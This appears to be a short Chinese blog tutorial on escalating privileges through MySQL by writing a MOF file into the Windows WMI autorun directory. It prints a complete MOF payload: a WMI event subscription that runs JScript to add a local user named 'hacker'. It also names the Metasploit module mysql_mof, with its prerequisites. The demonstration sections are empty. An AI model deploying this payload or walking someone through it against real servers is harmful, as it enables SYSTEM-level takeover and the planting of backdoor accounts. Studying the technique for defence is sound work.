Mysql数据库—MOF提权

Mysql数据库—MOF提权

一篇关于利用mysql数据库的提权。

mof提权原理

mof指的是托管对象格式，是一种文件类型，它（nullevt.mof）在 C:\WINDOWS\system32\wbem\mof\ 路径下，将会每隔一段时间以system权限执行一次，我们可以通过root权限下的mysql将该文件写入到路径下，以达到提权的效果。

uullevt.mof的提权代码如下：

#pragma namespace(“\\.\root\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\Cimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa \”Win32_LocalTime\” “
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user hacker hacker /add\”)“;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

msf提权演示

提权条件：1、mysql允许远程连接；2、secure_file_priv的值为空。

载入攻击模块：
exploit/windows/mysql/mysql_mof

设置参数值：


然后进行攻击
拿到权限

参考文章

https://www.cnblogs.com/wh4am1/p/6613770.html
https://www.cnblogs.com/xishaonian/p/6384535.html